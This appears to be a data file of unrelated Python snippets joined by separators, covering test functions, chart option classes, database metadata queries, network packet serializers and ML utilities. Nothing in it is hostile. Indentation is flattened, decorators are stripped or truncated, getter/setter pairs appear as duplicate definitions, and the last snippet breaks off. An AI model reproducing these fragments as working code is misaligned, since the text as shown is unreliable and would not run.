self._update_gap_params(params, constraint)
if isinstance(constraint, _Constraint.Median):
self._update_median_params(params, constraint)
if isinstance(constraint, _Constraint.Span):
self._update_span_params(params, constraint)
for (constraint, value) in params.items():
setattr(cython_imp, constraint, value)
if (isinstance(min_frequency, float) and (min_frequency <= 1.0)):
cython_imp.theta = (cython_imp.N * min_frequency)
else:
cython_imp.theta = min_frequency
return cython_imp
def _update_average_params(params: dict, constraint: _Constraint.Average) -> NoReturn:
att_id = (params[_Constants.num_att] - 1)
params[_Constants.tot_avr].append(att_id)
if constraint.has_lower_bound():
params[_Constants.lavr].append(constraint.lower_bound)
params[_Constants.lavri].append(att_id)
params[_Constants.num_avr][(- 1)] += 1
if constraint.has_upper_bound():
params[_Constants.uavr].append(constraint.upper_bound)
params[_Constants.uavri].append(att_id)
params[_Constants.num_avr][(- 1)] += 1
def _update_gap_params(params: dict, constraint: _Constraint.Gap) -> NoReturn:
att_id = (params[_Constants.num_att] - 1)
params[_Constants.tot_gap].append(att_id)
if constraint.has_lower_bound():
params[_Constants.lgap].append(constraint.lower_bound)
params[_Constants.lgapi].append(att_id)
if constraint.has_upper_bound():
params[_Constants.ugap].append(constraint.upper_bound)
params[_Constants.ugapi].append(att_id)
def _update_median_params(params: dict, constraint: _Constraint.Median) -> NoReturn:
att_id = (params[_Constants.num_att] - 1)
if constraint.has_lower_bound():
params[_Constants.lmed].append(constraint.lower_bound)
params[_Constants.lmedi].append(att_id)
params[_Constants.num_med][(- 1)] += 1
if constraint.has_upper_bound():
params[_Constants.umed].append(constraint.upper_bound)
params[_Constants.umedi].append(att_id)
params[_Constants.num_med][(- 1)] += 1
def _update_span_params(params: dict, constraint: _Constraint.Span) -> NoReturn:
att_id = (params[_Constants.num_att] - 1)
params[_Constants.tot_spn].append(att_id)
if constraint.has_lower_bound():
params[_Constants.lspn].append(constraint.lower_bound)
params[_Constants.lspni].append(att_id)
params[_Constants.num_minmax][(- 1)] += 2
if constraint.has_upper_bound():
params[_Constants.uspn].append(constraint.upper_bound)
params[_Constants.uspni].append(att_id)
def __str__(self) -> str:
str = '\n\nSeq2Pat'
for (attribute, constraints) in self.attr_to_cts.items():
str += ('\nConstraints of Attribute: ' + repr(attribute))
str += ('\nConstraints: ' + repr(constraints))
for (constraint_type, constraint) in constraints.items():
str += ((('\nConstraint: ' + constraint_type) + ' ') + repr(constraint))
str += ('\nLB: ' + repr(constraint.lower_bound))
str += ('\nUB: ' + repr(constraint.upper_bound))
return str |
def test_add_code_node():
asforest = AbstractSyntaxForest(condition_handler=ConditionHandler())
asforest.add_code_node((code_node_1 := asforest.factory.create_code_node([])))
assert ((len(asforest) == 2) and (set(asforest.get_roots) == {code_node_1, asforest._current_root}))
asforest.add_code_node((code_node_2 := CodeNode([Assignment(var('a'), const(2)), Assignment(var('b'), const(5))], asforest.condition_handler.get_true_value())))
assert ((len(asforest) == 3) and (asforest.condition_handler == ConditionHandler()))
assert (set(asforest.get_roots) == {code_node_1, code_node_2, asforest._current_root}) |
class _MenuItem(HasTraits):
checked = Bool(False)
controller = Any()
enabled = Bool(True)
visible = Bool(True)
group = Any()
def __init__(self, parent, menu, item, controller):
self.item = item
self.control_id = 1
self.control = None
if (controller is not None):
self.controller = controller
controller.add_to_menu(self) |
def source_folder():
parent_temp = tempfile.mkdtemp()
src_dir = os.path.join(parent_temp, 'source', '')
nested_dir = os.path.join(src_dir, 'nested')
local.mkdir(nested_dir)
local.touch(os.path.join(src_dir, 'original.txt'))
with open(os.path.join(src_dir, 'original.txt'), 'w') as fh:
fh.write('hello original')
local.touch(os.path.join(nested_dir, 'more.txt'))
(yield src_dir)
shutil.rmtree(parent_temp) |
class PreviewHandler(Handler):
def get_object(self):
page = get_object_or_404(self.page_model, pk=self.args[1])
self.request.path = page.get_absolute_url()
return page
def handler(self, request, *args, **kwargs):
if (not request.user.is_staff):
raise Http404('Not found (not allowed)')
response = super().handler(request, *args, **kwargs)
response['Cache-Control'] = 'no-cache, must-revalidate, no-store, private'
return response |
def test_pod_security_policy():
config = ''
resources = ('role', 'rolebinding', 'serviceaccount', 'podsecuritypolicy')
r = helm_template(config)
for resource in resources:
assert (resource not in r)
assert ('serviceAccountName' not in r['statefulset'][uname]['spec']['template']['spec'])
config = '\nrbac:\n create: true\n serviceAccountName: ""\n\npodSecurityPolicy:\n create: true\n name: ""\n'
r = helm_template(config)
for resource in resources:
assert (resource in r)
assert (r['role'][uname]['rules'][0] == {'apiGroups': ['extensions'], 'verbs': ['use'], 'resources': ['podsecuritypolicies'], 'resourceNames': [uname]})
assert (r['rolebinding'][uname]['subjects'] == [{'kind': 'ServiceAccount', 'namespace': 'default', 'name': uname}])
assert (r['rolebinding'][uname]['roleRef'] == {'apiGroup': 'rbac.authorization.k8s.io', 'kind': 'Role', 'name': uname})
assert (r['statefulset'][uname]['spec']['template']['spec']['serviceAccountName'] == uname)
psp_spec = r['podsecuritypolicy'][uname]['spec']
assert (psp_spec['privileged'] is True) |
class OptionSeriesAreaSonificationDefaultspeechoptionsMappingTime(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def character_aware_vertical_mirror(art: str) -> str:
art_lines = art.split('\n')
art_lines.reverse()
output = ''
for line in art_lines:
output_line = ''.join([(vmirror_character_alternatives[char] if (char in vmirror_character_alternatives.keys()) else char) for char in line])
output += (output_line + '\n')
output = output[:(- 1)]
return output |
class DatasetCorrelation(MetricResult):
class Config():
dict_exclude_fields = {'correlation', 'correlations_calculate'}
pd_exclude_fields = {'correlation', 'correlations_calculate'}
correlation: Dict[(str, pd.DataFrame)]
stats: Dict[(str, CorrelationStats)]
correlations_calculate: Optional[Dict[(str, pd.DataFrame)]] |
class AuditCategoryRelation(db.Model):
__table_args__ = {'schema': 'auditsearch'}
__tablename__ = 'finding_rel_vw'
primary_category_id = db.Column(db.String, index=True, primary_key=True, doc=docs.PRIMARY_CATEGORY_ID)
primary_category_name = db.Column(db.String, doc=docs.PRIMARY_CATEGORY_NAME)
sub_category_id = db.Column(db.String, index=True, primary_key=True, doc=docs.SUB_CATEGORY_ID)
sub_category_name = db.Column(db.String, index=True, doc=docs.SUB_CATEGORY_NAME) |
def get_cosineannealing_scheduler_with_warmup(optimizer: torch.optim.Optimizer, max_epochs: int=12, warmup_epochs: float=0.1):
warmup_milestone_epoch = max(1.0, int((warmup_epochs * max_epochs)))
warmup_scheduler = torch.optim.lr_scheduler.LinearLR(optimizer, start_factor=0.01, end_factor=1.0, total_iters=max(1.0, warmup_milestone_epoch))
cosineannealing_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=(max_epochs - warmup_milestone_epoch))
scheduler = torch.optim.lr_scheduler.SequentialLR(optimizer, [warmup_scheduler, cosineannealing_scheduler], milestones=[warmup_milestone_epoch])
return scheduler |
.parametrize('antialias', [True, False])
def test_project_grid_antialias(antialias):
shape = (50, 40)
lats = np.linspace(2, 10, shape[1])
lons = np.linspace((- 10), 2, shape[0])
data = np.ones(shape, dtype='float')
grid = xr.DataArray(data, coords=[lons, lats], dims=('latitude', 'longitude'))
proj = project_grid(grid, projection, antialias=antialias)
if antialias:
assert ('BlockReduce' in proj.attrs['metadata'])
else:
assert ('BlockReduce' not in proj.attrs['metadata'])
assert (proj.dims == ('northing', 'easting'))
assert (proj.name == 'scalars')
assert (proj.shape == shape)
spacing_east = (proj.easting[1:] - proj.easting[0:(- 1)])
npt.assert_allclose(spacing_east, spacing_east[0])
spacing_north = (proj.northing[1:] - proj.northing[0:(- 1)])
npt.assert_allclose(spacing_north, spacing_north[0])
npt.assert_allclose(proj.values[(~ np.isnan(proj.values))], 1) |
class OptionPlotoptionsGaugeSonificationContexttracksMapping(Options):
def frequency(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingFrequency':
return self._config_sub_data('frequency', OptionPlotoptionsGaugeSonificationContexttracksMappingFrequency)
def gapBetweenNotes(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingGapbetweennotes':
return self._config_sub_data('gapBetweenNotes', OptionPlotoptionsGaugeSonificationContexttracksMappingGapbetweennotes)
def highpass(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingHighpass':
return self._config_sub_data('highpass', OptionPlotoptionsGaugeSonificationContexttracksMappingHighpass)
def lowpass(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingLowpass':
return self._config_sub_data('lowpass', OptionPlotoptionsGaugeSonificationContexttracksMappingLowpass)
def noteDuration(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingNoteduration':
return self._config_sub_data('noteDuration', OptionPlotoptionsGaugeSonificationContexttracksMappingNoteduration)
def pan(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingPan':
return self._config_sub_data('pan', OptionPlotoptionsGaugeSonificationContexttracksMappingPan)
def pitch(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingPitch':
return self._config_sub_data('pitch', OptionPlotoptionsGaugeSonificationContexttracksMappingPitch)
def playDelay(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingPlaydelay':
return self._config_sub_data('playDelay', OptionPlotoptionsGaugeSonificationContexttracksMappingPlaydelay)
def rate(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingRate':
return self._config_sub_data('rate', OptionPlotoptionsGaugeSonificationContexttracksMappingRate)
def text(self):
return self._config_get(None)
def text(self, text: str):
self._config(text, js_type=False)
def time(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingTime':
return self._config_sub_data('time', OptionPlotoptionsGaugeSonificationContexttracksMappingTime)
def tremolo(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingTremolo':
return self._config_sub_data('tremolo', OptionPlotoptionsGaugeSonificationContexttracksMappingTremolo)
def volume(self) -> 'OptionPlotoptionsGaugeSonificationContexttracksMappingVolume':
return self._config_sub_data('volume', OptionPlotoptionsGaugeSonificationContexttracksMappingVolume) |
def test_config_dataclasses():
cat = Cat('testcat', value_in=1, value_out=2)
config = {'cfg': {'': 'catsie.v3', 'arg': cat}}
result = my_registry.resolve(config)['cfg']
assert isinstance(result, Cat)
assert (result.name == cat.name)
assert (result.value_in == cat.value_in)
assert (result.value_out == cat.value_out) |
class OptionSeriesVennSonificationContexttracksMappingLowpass(Options):
def frequency(self) -> 'OptionSeriesVennSonificationContexttracksMappingLowpassFrequency':
return self._config_sub_data('frequency', OptionSeriesVennSonificationContexttracksMappingLowpassFrequency)
def resonance(self) -> 'OptionSeriesVennSonificationContexttracksMappingLowpassResonance':
return self._config_sub_data('resonance', OptionSeriesVennSonificationContexttracksMappingLowpassResonance) |
class ExaMetaData(object):
snapshot_execution_hint = '/*snapshot execution*/'
def __init__(self, connection):
self.connection = connection
self.sql_keywords = None
def sql_columns(self, query, query_params=None):
st = self.connection.cls_statement(self.connection, query, query_params, prepare=True)
columns = st.columns()
st.close()
return columns
def schema_exists(self, schema_name):
object_name = self.connection.format.default_format_ident_value(schema_name)
if (self.connection.protocol_version() >= constant.PROTOCOL_V2):
st = self.execute_meta_nosql('getSchemas', {'schema': object_name})
else:
st = self.execute_snapshot('\n SELECT 1\n FROM sys.exa_schemas\n WHERE schema_name={object_name}\n ', {'object_name': object_name})
return (st.rowcount() > 0)
def table_exists(self, table_name):
if isinstance(table_name, tuple):
object_schema = self.connection.format.default_format_ident_value(table_name[0])
object_name = self.connection.format.default_format_ident_value(table_name[1])
else:
object_schema = self.connection.current_schema()
object_name = self.connection.format.default_format_ident_value(table_name)
if (self.connection.protocol_version() >= constant.PROTOCOL_V2):
st = self.execute_meta_nosql('getTables', {'schema': object_schema, 'table': object_name, 'tableTypes': ['TABLE']})
else:
st = self.execute_snapshot('\n SELECT 1\n FROM sys.exa_all_tables\n WHERE table_schema={object_schema}\n AND table_name={object_name}\n ', {'object_schema': object_schema, 'object_name': object_name})
return (st.rowcount() > 0)
def view_exists(self, view_name):
if isinstance(view_name, tuple):
object_schema = self.connection.format.default_format_ident_value(view_name[0])
object_name = self.connection.format.default_format_ident_value(view_name[1])
else:
object_schema = self.connection.current_schema()
object_name = self.connection.format.default_format_ident_value(view_name)
if (self.connection.protocol_version() >= constant.PROTOCOL_V2):
st = self.execute_meta_nosql('getTables', {'schema': object_schema, 'table': object_name, 'tableTypes': ['VIEW']})
else:
st = self.execute_snapshot('\n SELECT 1\n FROM sys.exa_all_views\n WHERE view_schema={object_schema}\n AND view_name={object_name}\n ', {'object_schema': object_schema, 'object_name': object_name})
return (st.rowcount() > 0)
def list_schemas(self, schema_name_pattern='%'):
st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_schemas\n WHERE schema_name LIKE {schema_name_pattern}\n ORDER BY schema_name ASC\n ', {'schema_name_pattern': schema_name_pattern})
return st.fetchall()
def list_tables(self, table_schema_pattern='%', table_name_pattern='%'):
st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_tables\n WHERE table_schema LIKE {table_schema_pattern}\n AND table_name LIKE {table_name_pattern}\n ORDER BY table_schema ASC, table_name ASC\n ', {'table_schema_pattern': table_schema_pattern, 'table_name_pattern': table_name_pattern})
return st.fetchall()
def list_views(self, view_schema_pattern='%', view_name_pattern='%'):
st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_views\n WHERE view_schema LIKE {view_schema_pattern}\n AND view_name LIKE {view_name_pattern}\n ORDER BY view_schema ASC, view_name ASC\n ', {'view_schema_pattern': view_schema_pattern, 'view_name_pattern': view_name_pattern})
return st.fetchall()
def list_columns(self, column_schema_pattern='%', column_table_pattern='%', column_object_type_pattern='%', column_name_pattern='%'):
st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_columns\n WHERE column_schema LIKE {column_schema_pattern}\n AND column_table LIKE {column_table_pattern}\n AND column_object_type LIKE {column_object_type_pattern}\n AND column_name LIKE {column_name_pattern}\n ', {'column_schema_pattern': column_schema_pattern, 'column_table_pattern': column_table_pattern, 'column_object_type_pattern': column_object_type_pattern, 'column_name_pattern': column_name_pattern})
return st.fetchall()
def list_objects(self, object_name_pattern='%', object_type_pattern='%', owner_pattern='%', root_name_pattern='%'):
st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_objects\n WHERE object_name LIKE {object_name_pattern}\n AND object_type LIKE {object_type_pattern}\n AND owner LIKE {owner_pattern}\n AND root_name LIKE {root_name_pattern}\n ', {'object_name_pattern': object_name_pattern, 'object_type_pattern': object_type_pattern, 'owner_pattern': owner_pattern, 'root_name_pattern': root_name_pattern})
return st.fetchall()
def list_object_sizes(self, object_name_pattern='%', object_type_pattern='%', owner_pattern='%', root_name_pattern='%'):
st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_object_sizes\n WHERE object_name LIKE {object_name_pattern}\n AND object_type LIKE {object_type_pattern}\n AND owner LIKE {owner_pattern}\n AND root_name LIKE {root_name_pattern}\n ', {'object_name_pattern': object_name_pattern, 'object_type_pattern': object_type_pattern, 'owner_pattern': owner_pattern, 'root_name_pattern': root_name_pattern})
return st.fetchall()
def list_indices(self, index_schema_pattern='%', index_table_pattern='%', index_owner_pattern='%'):
st = self.execute_snapshot('\n SELECT *\n FROM sys.exa_all_indices\n WHERE index_schema LIKE {index_schema_pattern}\n AND index_table LIKE {index_table_pattern}\n AND index_owner LIKE {index_owner_pattern}\n ', {'index_schema_pattern': index_schema_pattern, 'index_table_pattern': index_table_pattern, 'index_owner_pattern': index_owner_pattern})
return st.fetchall()
def list_sql_keywords(self):
if (not self.sql_keywords):
if (self.connection.protocol_version() >= constant.PROTOCOL_V2):
st = self.execute_meta_nosql('getKeywords')
self.sql_keywords = [r['KEYWORD'] for r in st.fetchall() if (r['RESERVED'] is True)]
else:
st = self.execute_snapshot('\n SELECT keyword\n FROM EXA_SQL_KEYWORDS\n WHERE reserved IS TRUE\n ORDER BY keyword\n ')
self.sql_keywords = st.fetchcol()
return self.sql_keywords
def execute_snapshot(self, query, query_params=None):
options = {'fetch_dict': True}
return self.connection.cls_statement(self.connection, f'{self.snapshot_execution_hint}{query}', query_params, **options)
def execute_meta_nosql(self, meta_command, meta_params=None):
if (self.connection.protocol_version() < constant.PROTOCOL_V2):
raise ExaRuntimeError(self.connection, 'Protocol version 2 is required to execute nosql meta data commands')
if (meta_command[0:3] != 'get'):
raise ExaRuntimeError(self.connection, "Meta command name should start with prefix 'get*'")
options = {'fetch_dict': True}
return self.connection.cls_statement(self.connection, meta_command, meta_params, meta_nosql=True, **options)
def __repr__(self):
return f'<{self.__class__.__name__} session_id={self.connection.session_id()}>' |
_renderer(wrap_type=TestRocAuc)
class TestRocAucRenderer(TestRenderer):
def render_html(self, obj: TestRocAuc) -> TestHtmlInfo:
info = super().render_html(obj)
curr_roc_curve: Optional[ROCCurve] = obj._roc_curve.get_result().current_roc_curve
ref_roc_curve: Optional[ROCCurve] = obj._roc_curve.get_result().reference_roc_curve
if (curr_roc_curve is None):
return info
tab_data = get_roc_auc_tab_data(curr_roc_curve, ref_roc_curve, color_options=self.color_options)
if (len(tab_data) == 1):
return info.with_details('ROC Curve', tab_data[0][1])
tabs = [TabData(name, widget) for (name, widget) in tab_data]
return info.with_details('', widget_tabs(title='', tabs=tabs)) |
class Migration(migrations.Migration):
dependencies = [('search', '0021_partition_transaction_search_pt1_index_prep_and_tables')]
operations = [migrations.RunPython(code=check_data_load_limit, reverse_code=migrations.RunPython.noop), migrations.RunSQL(sql='\n INSERT INTO temp.transaction_search_fabs_temp\n SELECT * FROM rpt.transaction_search WHERE is_fpds = FALSE;\n ', reverse_sql='\n DO\n $$\n BEGIN\n TRUNCATE temp.transaction_search_fabs_temp;\n EXCEPTION\n WHEN OTHERS THEN\n NULL; -- ignore error\n END\n $$\n ;\n '), migrations.RunSQL(sql='\n INSERT INTO temp.transaction_search_fpds_temp\n SELECT * FROM rpt.transaction_search WHERE is_fpds = TRUE;\n ', reverse_sql='\n DO\n $$\n BEGIN\n TRUNCATE temp.transaction_search_fpds_temp;\n EXCEPTION\n WHEN OTHERS THEN\n NULL; -- ignore error\n END\n $$\n ;\n ')] |
class TestLinuxKernelUnpacker(TestUnpackerBase):
def test_unpacker_selection_generic(self):
self.check_unpacker_selection('linux/kernel', 'LinuxKernel')
.parametrize('input_file, expected', [('bzImage_bzip2', 'vmlinux_BZIP_17001'), ('bzImage_gzip', 'vmlinux_GZIP_17001'), ('bzImage_lz4', 'vmlinux_LZ4_17001'), ('bzImage_lzma', 'vmlinux_LZMA_17001'), ('bzImage_lzo', 'vmlinux_LZOP_17001'), ('bzImage_xz', 'vmlinux_XZ_17001')])
def test_extraction_valid_bz_image(self, input_file, expected):
(files, _) = self.unpacker.extract_files_from_file(str((TEST_DATA_DIR / input_file)), self.tmp_dir.name)
assert (files == [str((Path(self.tmp_dir.name) / expected))])
def test_extraction_invalid_image(self):
(files, _) = self.unpacker.extract_files_from_file(str((TEST_DATA_DIR / 'bogus_image.bin')), self.tmp_dir.name)
assert (files == []) |
class LittleLegionHoldAction(UserAction):
def apply_action(self):
src = self.source
g = self.game
g.process_action(DrawCards(src, 1))
turn = PlayerTurn.get_current(g)
try:
turn.pending_stages.remove(DropCardStage)
except Exception:
pass
return True |
class RegisterDialogue(BaseRegisterDialogue):
def __init__(self, dialogue_label: DialogueLabel, self_address: Address, role: BaseDialogue.Role, message_class: Type[RegisterMessage]) -> None:
BaseRegisterDialogue.__init__(self, dialogue_label=dialogue_label, self_address=self_address, role=role, message_class=message_class) |
def get_contract_from_blockchain(address, key_file=None):
key = get_api_key(key_file)
api = Contract(address=address, api_key=key)
sourcecode = api.get_sourcecode()
with open(contract_dir, 'w') as contract_file:
contract_file.write(sourcecode[0]['SourceCode'])
return contract_dir |
_drop_double_transpose.register(Negative)
_drop_double_transpose.register(Add)
_drop_double_transpose.register(Mul)
_drop_double_transpose.register(Solve)
_drop_double_transpose.register(Inverse)
_drop_double_transpose.register(DiagonalTensor)
_drop_double_transpose.register(Reciprocal)
def _drop_double_transpose_distributive(expr, self):
return type(expr)(*map(self, expr.children)) |
def _remove_no_op_expands(sorted_graph: List[Tensor]) -> List[Tensor]:
ops = graph_utils.get_sorted_ops(sorted_graph)
for op in ops:
if (op._attrs['op'] != 'expand'):
continue
outputs = op._attrs['outputs']
assert (len(outputs) == 1), 'expand must only have 1 output'
expand_output = outputs[0]
if expand_output._attrs['is_output']:
continue
inputs = op._attrs['inputs']
assert (len(inputs) >= 1), 'expand must have at least 1 input'
expand_input = inputs[0]
assert (len(op._attrs['dim_types']) == len(expand_output._attrs['shape'])), 'expand must have dim_type for every output dimension'
if any(((dt != ExpandDimensionType.KEEP_DIM) for dt in op._attrs['dim_types'])):
continue
expand_input._attrs['shape'] = expand_output._attrs['shape']
for dst in list(expand_output.dst_ops()):
transform_utils.replace_tensor_for_op(dst, expand_output, expand_input)
transform_utils.remove_tensor_from_sorted_graph(expand_output)
return transform_utils.sanitize_sorted_graph(sorted_graph) |
def _validate_map(datum, schema, named_schemas, parent_ns, raise_errors, options):
return (isinstance(datum, Mapping) and all((isinstance(k, str) for k in datum)) and all((_validate(datum=v, schema=schema['values'], named_schemas=named_schemas, field=parent_ns, raise_errors=raise_errors, options=options) for v in datum.values()))) |
class CommandsTestCase(TestCase):
def test_import_qof_prevalence(self):
args = []
fixture_dir = 'frontend/tests/fixtures/commands/'
opts = {'by_ccg': (fixture_dir + 'prevalencebyccg.csv'), 'by_practice': (fixture_dir + 'prevalencebyprac.csv'), 'start_year': 2013}
call_command('import_qof_prevalence', *args, **opts)
ccg = PCT.objects.get(code='00C')
qof_for_ccg = QOFPrevalence.objects.filter(pct=ccg)
self.assertEqual(qof_for_ccg.count(), 24)
qof_dementia = qof_for_ccg.get(indicator_group='DEM')
self.assertEqual(qof_dementia.disease_register_size, 977)
practice = Practice.objects.get(code='A81002')
qof_for_practice = QOFPrevalence.objects.filter(practice=practice)
self.assertEqual(qof_for_practice.count(), 24)
qof_dementia = qof_for_practice.get(indicator_group='DEM')
self.assertEqual(qof_dementia.disease_register_size, 171) |
def test_doc_empty_overwrite_type_bound_procedure_fun():
string = write_rpc_request(1, 'initialize', {'rootPath': str(test_dir)})
file_path = ((test_dir / 'subdir') / 'test_free.f90')
string += hover_request(file_path, 22, 17)
string += hover_request(file_path, 22, 32)
(errcode, results) = run_request(string)
assert (errcode == 0)
check_return(results[1], ((0, '-----'), (1, 'Doc 3 '), (2, ''), (3, '**Return:** '), (4, '`norm`return value docstring')), True)
check_return(results[2], ((0, '-----'), (1, 'Top level docstring '), (2, ''), (3, '**Parameters:** '), (4, '`self` self value docstring '), (5, ''), (6, '**Return:** '), (7, '`norm`return value docstring')), True) |
def has_reference(fname1, fname2):
try:
with open(url_to_fname(fname1), encoding='UTF-8') as fptr:
content1 = fptr.read()
with open(url_to_fname(fname2), encoding='UTF-8') as fptr:
content2 = fptr.read()
return ((basename(fname1) in content2) or (basename(fname2) in content1))
except UnicodeDecodeError as exc:
print(f'UnicodeDecodeError: {exc}', file=sys.stderr)
return False |
def test_buildPF_pass_1():
d = d_pass[1]
pf = build_portfolio(**d)
assert isinstance(pf, Portfolio)
assert isinstance(pf.get_stock(names_yf[0]), Stock)
assert isinstance(pf.data, pd.DataFrame)
assert isinstance(pf.portfolio, pd.DataFrame)
assert (len(pf.stocks) == len(pf.data.columns))
assert (pf.data.columns.tolist() == names_yf)
assert (pf.data.index.name == 'Date')
assert (pf.portfolio == df_pf2_yf).all().all()
assert ((pf.comp_weights() - weights_no_df_pf) <= strong_abse).all()
pf.properties() |
.unit_saas
def test_saas_request_without_method_or_path():
with pytest.raises(ValidationError) as exc:
SaaSRequest(path='/test')
assert ('A request must specify a method' in str(exc.value))
with pytest.raises(ValidationError) as exc:
SaaSRequest(method='GET')
assert ('A request must specify a path' in str(exc.value)) |
class OptionPlotoptionsArearangeStatesHover(Options):
def animation(self) -> 'OptionPlotoptionsArearangeStatesHoverAnimation':
return self._config_sub_data('animation', OptionPlotoptionsArearangeStatesHoverAnimation)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def halo(self) -> 'OptionPlotoptionsArearangeStatesHoverHalo':
return self._config_sub_data('halo', OptionPlotoptionsArearangeStatesHoverHalo)
def lineWidth(self):
return self._config_get(None)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def lineWidthPlus(self):
return self._config_get(1)
def lineWidthPlus(self, num: float):
self._config(num, js_type=False)
def marker(self) -> 'OptionPlotoptionsArearangeStatesHoverMarker':
return self._config_sub_data('marker', OptionPlotoptionsArearangeStatesHoverMarker) |
class bsn_forward_error_correction(bsn):
type = 65535
experimenter = 6035143
exp_type = 2
def __init__(self, configured=None, enabled=None):
if (configured != None):
self.configured = configured
else:
self.configured = 0
if (enabled != None):
self.enabled = enabled
else:
self.enabled = 0
return
def pack(self):
packed = []
packed.append(struct.pack('!H', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.experimenter))
packed.append(struct.pack('!L', self.exp_type))
packed.append(struct.pack('!L', self.configured))
packed.append(struct.pack('!L', self.enabled))
length = sum([len(x) for x in packed])
packed[1] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = bsn_forward_error_correction()
_type = reader.read('!H')[0]
assert (_type == 65535)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
_experimenter = reader.read('!L')[0]
assert (_experimenter == 6035143)
_exp_type = reader.read('!L')[0]
assert (_exp_type == 2)
obj.configured = reader.read('!L')[0]
obj.enabled = reader.read('!L')[0]
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.configured != other.configured):
return False
if (self.enabled != other.enabled):
return False
return True
def pretty_print(self, q):
q.text('bsn_forward_error_correction {')
with q.group():
with q.indent(2):
q.breakable()
q.text('configured = ')
value_name_map = {0: 'OFP_BSN_FEC_CONFIG_STATE_UNSET', 1: 'OFP_BSN_FEC_CONFIG_STATE_ENABLED', 2: 'OFP_BSN_FEC_CONFIG_STATE_DISABLED'}
if (self.configured in value_name_map):
q.text(('%s(%d)' % (value_name_map[self.configured], self.configured)))
else:
q.text(('%#x' % self.configured))
q.text(',')
q.breakable()
q.text('enabled = ')
q.text(('%#x' % self.enabled))
q.breakable()
q.text('}') |
class loopback(operation):
_PACK_STR = '!4BI'
_MIN_LEN = struct.calcsize(_PACK_STR)
_TLV_OFFSET = 4
def __init__(self, md_lv, version, transaction_id, tlvs):
super(loopback, self).__init__(md_lv, version, tlvs)
self._flags = 0
self.transaction_id = transaction_id
def parser(cls, buf):
(md_lv_version, opcode, flags, tlv_offset, transaction_id) = struct.unpack_from(cls._PACK_STR, buf)
md_lv = int((md_lv_version >> 5))
version = int((md_lv_version & 31))
tlvs = cls._parser_tlvs(buf[cls._MIN_LEN:])
return cls(md_lv, version, transaction_id, tlvs)
def serialize(self):
buf = struct.pack(self._PACK_STR, ((self.md_lv << 5) | self.version), self._opcode, self._flags, self._TLV_OFFSET, self.transaction_id)
buf = bytearray(buf)
if self.tlvs:
buf.extend(self._serialize_tlvs(self.tlvs))
buf.extend(struct.pack('!B', CFM_END_TLV))
return buf
def __len__(self):
return self._calc_len(self._MIN_LEN) |
def get_roc_auc_tab_data(curr_roc_curve: ROCCurve, ref_roc_curve: Optional[ROCCurve], color_options: ColorOptions) -> List[Tuple[(str, BaseWidgetInfo)]]:
additional_plots = []
cols = 1
subplot_titles = ['']
if (ref_roc_curve is not None):
cols = 2
subplot_titles = ['current', 'reference']
for label in curr_roc_curve.keys():
fig = make_subplots(rows=1, cols=cols, subplot_titles=subplot_titles, shared_yaxes=True)
trace = go.Scatter(x=curr_roc_curve[label].fpr, y=curr_roc_curve[label].tpr, mode='lines', name='ROC', legendgroup='ROC', marker=dict(size=6, color=color_options.get_current_data_color()))
fig.add_trace(trace, 1, 1)
fig.update_xaxes(title_text='False Positive Rate', row=1, col=1)
if (ref_roc_curve is not None):
trace = go.Scatter(x=ref_roc_curve[label].fpr, y=ref_roc_curve[label].tpr, mode='lines', name='ROC', legendgroup='ROC', showlegend=False, marker=dict(size=6, color=color_options.get_current_data_color()))
fig.add_trace(trace, 1, 2)
fig.update_xaxes(title_text='False Positive Rate', row=1, col=2)
fig.update_layout(yaxis_title='True Positive Rate', showlegend=True)
additional_plots.append((str(label), plotly_figure(title='', figure=fig)))
return additional_plots |
def test_attach_external_modules_that_do_not_inherit_from_module_class(module1_unique, module2_unique, module3_unique, module4_unique):
w3 = Web3(EthereumTesterProvider(), external_modules={'module1': module1_unique, 'module2': (module2_unique, {'submodule1': (module3_unique, {'submodule2': module4_unique})})})
assert hasattr(w3, 'module1')
assert (w3.module1.a == 'a')
assert (w3.module1.b() == 'b')
assert (w3.module1.return_eth_chain_id == w3.eth.chain_id)
assert hasattr(w3, 'module2')
assert (w3.module2.c == 'c')
assert (w3.module2.d() == 'd')
assert hasattr(w3.module2, 'submodule1')
assert (w3.module2.submodule1.e == 'e')
assert hasattr(w3.module2.submodule1, 'submodule2')
assert (w3.module2.submodule1.submodule2.f == 'f')
assert hasattr(w3, 'geth')
assert hasattr(w3, 'eth')
assert is_integer(w3.eth.chain_id) |
class AgentPipeline(GenericAgent):
pipeline: List = []
def __init__(self, module_list: List[GenericAgent]) -> None:
self.module_list = module_list
self.check_pipeline_types()
def check_pipeline_types(self):
if (len(self.pipeline) > 1):
for i in range(1, len(self.pipeline)):
